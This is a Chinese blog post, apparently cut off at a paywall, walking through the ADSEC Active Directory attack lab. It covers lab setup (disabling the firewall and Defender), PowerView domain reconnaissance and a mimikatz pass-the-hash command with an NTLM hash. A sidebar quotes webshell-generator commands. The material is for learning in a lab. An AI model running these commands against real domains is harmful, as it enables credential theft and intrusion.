从Github一开源项目ADSEC【学习域渗透攻防基础】

最新推荐文章于 2024-04-15 09:58:41 发布
最新推荐文章于 2024-04-15 09:58:41 发布
阅读量2k 收藏 2
点赞数
分类专栏: 安全 网络 渗透测试 文章标签: 网络安全 渗透测试 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HBohan/article/details/119251550
版权
本文基于GitHub上的开源项目ADSEC,探讨域渗透攻防的基础知识。内容涵盖环境搭建、域信息搜集、NTLM哈希传递攻击、Kerberos攻防及权限维持等,适合网络安全初学者。通过实际操作,学习如何使用PowerView、mimikatz等工具进行域渗透。
摘要由CSDN通过智能技术生成

在这里插入图片描述
学习的开源项目是:

https://github.com/cfalta/adsec

有些地方是直接Google 翻译过来的。

注意:本人域渗透新手,很多问题都不懂,有问题欢迎大哥后台留言啊!!!

Lab Setup – 域环境搭建

学习的过程中,最难的就是环境搭建了。(因为有些坑,别人不一定遇到,么有地方可以问,然后有些问题就离谱。。)

物理机:MacBookPro 2020 Intel i5
虚拟机:Vmware Fusion Windows Server 2019 * 3

域成员用户密码:P@ssw0rd123!(00和01)
域机器本地管理员密码:P@ssw0rd123!@#(P@ssw0rd123!!!)
域控机器管理员密码:P@ssw0rd123!!!
密码随便自己设置符合要求就可以,这里列出来只是害怕忘记了。

搭建一个域控,两台域成员机器,然后能ping通就好了。
Configure the following steps on every VM:

Point the DNS server to the IP of ADSEC-DC
Disable Windows Firewall (run in Powershell with admin rights)

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
Disable Windows Defender
Uninstall-WindowsFeature -Name Windows-Defender

在这里插入图片描述
在这里插入图片描述

在两台成员机器上用, john P@ssw0rd/blee TekkenIsAwesome! 来认证加入域。

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

![

攻击机器环境搭建

](https://img-blog.csdnimg.cn/6165c2c1457a4ba6b126109021b23421.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0hCb2hhbg==,size_16,color_FFFFFF,t_70)

该环境是假设john这台ADSEC-00 被攻破了,作为入口来进行AD域渗透。因为要通过powershell 脚本来安装攻击的工具,所以需要再分配一张网卡,让这台机器出网。

在这里插入图片描述

neo4j 图数据库安装

https://neo4j.com/artifact.php?name=neo4j-desktop-1.4.7-setup.exe

https://www.oracle.com/java/technologies/javase-jdk11-downloads.html

BloodHound

Exercise 1 – Reconnaissance(域信息搜集)

这里主要是用的PowerView,
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

首先是导入PowerView模块,

cat -raw “.\PowerView.ps1” | iex

域内基础信息和域控信息

比如域名、域控ip、域控的操作系统版本等

获取所有域计算机和用户
注意:通常情况下需要过滤,因为真实的域环境中会有大量结果。

Get-DomainComputer

过滤域管:

Get-DomainUser|?{$_.memberof -like “Domain Admins”} | select
samaccountname
在这里插入图片描述

只显示用户名:
在这里插入图片描述

获取所有域计算机,但仅显示名称、DNS 名称和创建日期,并以表格形式显示

Get-DomainComputer | select samaccountname,dnshostname,whencreated |
Format-Table

在这里插入图片描述

获取自定义用户组

Get-DomainGroup | ? { $.distinguishedname -notlike “CN=Users” -and
$.distinguishedname -notlike “CN=Builtin”} | select
samaccountname,description

在这里插入图片描述

第一章问题

(主要就是熟悉PowerView的相关用法,Powershell查询语法)
https://github.com/PowerShellMafia/PowerSploit/tree/dev/Recon

域中有多少台计算机以及它们在什么操作系统上运行?
在这里插入图片描述

域中有多少用户对象?编写一个 powershell 查询,以表格形式列出所有用户,仅显示属性 samaccountname、displayname、description 和最后一次密码更改
在这里插入图片描述

您能识别任何自定义管理组吗?以通用方式更改上面的 powershell 查询,使其仅返回自定义管理组。

Get-DomainGroup | ? { $.distinguishedname -like “CN=Manage” -or
$.distinguishedname -like “CN=admin”} | select
samaccountname,description

在这里插入图片描述

谁是您找到的自定义管理员组的成员,他最后一次设置密码是什么时候?
在这里插入图片描述

想出识别域中服务帐户的简单方法吗?编写一个 powershell 查询,根据您提出的模式列出所有服务帐户。

Get-DomainUser -SPN |select
serviceprincipalname,userprincipalname,pwdlastset,lastlogon

在这里插入图片描述

Exercise 2 – NTLM (Pass-the-Hash)【哈希传递攻击】

工具:

mimikatz
psexec
在这里插入图片描述

获取到管理员的hash,37bef461dec3d4cb748209d3c3185132
在这里插入图片描述

然后pth,

sekurlsa::pth /user:Administrator
/ntlm:37bef461dec3d4cb748209d3c3185132 /domain:redteamlab.com

最低0.47元/天 解锁文章
IT老涵
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
超实用的网络安全开源工具
哆啦安全
09-19 432
1.Web Shell生成器和命令行接口工具 生成器使用了php、asp和jsp来创建Webshell https://github.com/EatonChips/wsh git clone https://github.com/EatonChips/wsh.git wsh 127.0.0.1:8080/test.php --param cmd wsh generate php --param cmd --no-file -o shell.php wsh generate php --no-file
GitHub 发布即登顶的渗透教程,做个黑客或安全管理员都随你!
03-22 503
今日的 GitHub 趋势榜榜首,发布仅两天,斩获超 1000 star,就是来自中国老司机的“渗透攻击”经验整理---Micro8。这位大牛研究渗透攻击超十年,这本笔记应该就是传说中的“学霸笔记”吧! 内容非常丰富,全套内容 111 课,理论、demo、项目、实践应有尽有,材料丰...
GitHub上有一份大神整理的十几年“渗透攻击”经验,你想要么?
爱编程
03-08 2605
来自:开源最前线(ID:OpenSourceTop)项目地址:https://github.com/Micropoor/Micro8在GitHub上,你出来可以托管自己的...
靶机渗透之narak,Github上最值得学习的10个网络安全开源项目
2401_84140519的博客
04-09 977
发现了tftp端口69开放,这是一个简单文件传输协议,用于在计算机网络中进行文件传输。与FTP协议不同的是,TFTP传输文件时不需要用户进行登录。它只能从文件服务器上下载或上传文件,不能列出目录。用来在客户机与服务器之间进行简单文件传输的协议,提供不复杂、开销不大的文件传输服务。那我们试试使用tftp协议,从靶机下载creds.txt。
来自GitHub的系列渗透测试工具
qq_53058639的博客
02-07 1507
Printer Exploitation Toolkit (PRET) - 用于打印机安全测试的工具,能够进行IP和USB连接,模糊测试以及利用PostScript,PJL和PCL打印机语言功能。THC Hydra - 在线密码破解工具,内置支持许多网络协议,包括HTTP,SMB,FTP,telnet,ICQ,MySQL,LDAP,IMAP,VNC等。PacketTotal - 简单,免费,高质量的数据包捕获文件分析,有助于快速检测网络传播的恶意软件(使用Bro和Suricata IDS签名)。
GitHub 上 10 个顶级开源项目,从基础到源码统统帮你搞定
m0_61408464的博客
09-02 6676
3. vue Github 地址:https://github.com/vuejs/vue star: 153 k 介绍: 尤大的前端框架。国人用的最多(容易上手,文档比较丰富),所以 Star 数量比较多还是有道理的。Vue (读音 /vjuː/,类似于 view) 是一套用于构建用户界面的渐进式框架。与其它大型框架不同的是,Vue 被设计为可以自底向上逐层应用。Vue 的核心库只关注视图层,不仅易于上手,还便于与第三方库或既有项目整合。另一方面,当与现代化的工具链以及各种支持类库结合使用时,
GitHub上最火的40个Android开源项目源码
09-05
GitHub上最火的40个Android开源项目源码,筛选了下,主要是把可以加到我们项目中的下了下来,这里有40个项目的描述,以及12个项目的源码,省的各位童鞋重复下载了,当然如果有童鞋需要其他的项目,我这里也给出了...
Github上最热门的11个Java开源项目你会了吗
程序媛小琬的博客
04-10 6181
前言 4月份GitHub上最热门的Java开源项目排行已经出炉啦,一起来看看吧! 1 JimuReport(地址见文末) 这是一款免费的数据可视化工具,报表与大屏设计!类似于excel操作风格,在线拖拽完成报表设计!功能涵盖: 报表设计、图形报表、打印设计、大屏设计等,永久免费! 2 dolphinscheduler(地址见文末) Apache DolphinScheduler是一个可视化的分布式大数据工作流任务调度系统,DolphinScheduler 致力于“可视化操作工作流(任务)之间的依赖关系,
19本Android经典教程+104个Github上火爆项目开源源码
03-27
4. "104个Github上火爆项目开源源码":这部分资源提供了实际项目的源代码,是学习实际开发技巧、了解最佳实践和最新技术趋势的绝佳途径。通过研究这些开源项目,开发者可以学习如何组织代码,实现复杂功能,以及如何...
网络攻防比赛平台源码(AWD-platform源码).7z
06-19
一个awd攻防比赛的裁判平台。 版本:beta v2.0 开发语言:python3 + django 平台分为两个部分 裁判机 靶机 通过特定接口,来实现靶机flag与服务器的通信 搭建流程 裁判机 安装所需环境 裁判机:python3+django 全局搜索woshiguanliyuan,并修改为随机字符串,此处为管理平台地址 /untitled/urls.py path('woshiguanliyuan/',views.admin,name='admin'), path('woshiguanliyuan/table/',views.admin_table,name='admin_table'), /app/views.py if 'woshiguanliyuan' not in request.META['HTTP_REFERER']: 第31和47换为你的目录 列:("/var/www/awd_platform/app/qwe.txt","a") 修改app/management/commands/init.py,添加用户 #['用户名','用户靶机token','用户靶机token'] user=[ ['123456','FF9C92C7SDFABB71566F73422C','FF9C92C7SDFABB71566F73422C'], ['aaabbb','311F8A54SV9K6B5FF4EAB20536','311F8A54SV9K6B5FF4EAB20536'] ] 修改/app/views.py第行d89f33b18ba2a74cd38499e587cb9dcd为靶机中设置的admin_token值的md5 if('d89f33b18ba2a74cd38499e587cb9dcd'==hl.hexdigest()): 运行 python3 manage.py init python3 manage.py manage.py runserver --insecure 靶机 安装所需环境 靶机:python+requests 修改send_flag.py参数,并将其放入靶机,设权限700。 靶机 sudo python send_flag.py。 靶机生成flag脚本,send_flag.py import requests import time import random import string import hashlib token='woshiwuxudong' # 红队 baji='311F8A54SV9K6B5FF4EAB20536' def getFlag(): #return ''.join(random.sample(string.ascii_letters + string.digits, 48)) m = hashlib.md5(''.join(random.sample(string.ascii_letters + string.digits, 48)).encode(encoding="utf-8")).hexdigest() return m while(1): f=open('/flag','w') flag=getFlag() f.write(flag) data={ 'flag':flag, 'token':token, 'baji':baji, } r=requests.post('http://127.0.0.1/caipanflag/',data=data) print(r.text) f.close() time.sleep(300) 重要须知 更新作者基础上: 1.增加flag验证一次性失效性,使得每个用户都并且仅可以提交一次flag 2.增加排名情况 3.flag改为MD5 4.增加丢失flag一轮扣100分
【转载】来自 GitHub 的系列渗透测试工具
fangganmin的博客
01-05 3089
51CTO2019-04-03 渗透测试 Kali - GNU / Linux发行版,专为数字取证和渗透测试而设计。(https://www.kali.org/) ArchStrike - 为安全专业人士和爱好者提供Arch GNU / Linux存储库。(https://archstrike.org/) BlackArch - 基于GNU / Linux的分布式渗透测试...
IT管理者应该了解的四项开源工具:Nextcloud、Flatpak、Phabricator、Guacamole
NewTyun的博客
05-09 1414
从文档共享到服务台,这些流行工具满足了IT团队的需求。开源工具在以下情况下具有独特的优势。正如许多IT人士所知,新问题每天都在发生。幸运的是,开源解决方案的开发是快速而激烈的(也许有些...
AdFreeDetector 开源了
lordhong
06-02 300
AdFree Android [url]http://forum.bigtincan.com/index.php?topic=121.0[/url] 是个通过修改hosts文件来达到阻止网络广告条显示在你手机上的一个Android应用。对于我们依靠广告收入为生的开发者,这个东西是让人非常切齿痛恨的。不仅仅是没有收入的问题,广告没显示的那个View会光秃秃的很难看,那些使用AdFree的用户也太小气...
探索ZeroLogon:解决Windows控制器安全漏洞的利器
最新发布
gitblog_00003的博客
04-15 477
探索ZeroLogon:解决Windows控制器安全漏洞的利器 zerologon项目地址:https://gitcode.com/gh_mirrors/ze/zerologon 项目简介 是一个开源项目,由RiskSense公司开发并维护。该项目主要针对网络安全的一个重大威胁——CVE-2020-1472(也被称作“ZeroLogon”漏洞)提供检测和缓解工具。此漏洞影响了Windows...
AdSec 中开裂梁截面刚度计算
聊聊结构的设计与分析
06-11 256
本文讨论了 AdSec 中开裂截面刚度的计算方法,并编制的相应的 Excel 脚本程序。通过将程序的计算结果与 AdSec 的结果比较,明确了计算的原理,以及简化的迭代过程。
AdSec 中梁截面的未开裂刚度以及开裂弯矩计算
聊聊结构的设计与分析
06-03 427
本文介绍了使用 AdSec 获取截面开裂弯矩,未开裂截面的短期以及长期截面刚度的方法。为后续分析开裂截面性质以及混凝土梁的变形做准备。
组策略(GPO)横向移动
qq_18811919的博客
03-30 440
本篇讲解了如何使用GPO组策略下发CS控制全机器以及单个机器的控制上线,在大型网络中通过GPO上线全部机器的情况是比较少的因为如果机器太多会导致CS卡顿因此非特殊情况不会上线全部机器,只会上线单个机器。
身份集权设施保护之Kerberos协议
ZAWX_NETSTARSEC的博客
05-30 907
Kerberosting需要选择简单的key,在三种爆破对象中,也就是用户账户,机器账户,服务账户,在比较安全的中用户账户的安全性会比较高,而机器账户密码是随机生成的,而且三十天更换一次,只有服务账户会出现弱口令的情况,因为在服务部署的时候往往会产生一个固定密码,而且可能从来不去改,所以优先选择服务账户,机器账户也是特殊的服务账户,因为它也有SPN,SPN是唯一标识符,就像下图中的格式,可以理解为代表了特定的服务,SPN只要符合格式,不管服务存不存在都可以用来进行密码爆破。而该属性默认是没有勾选上的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值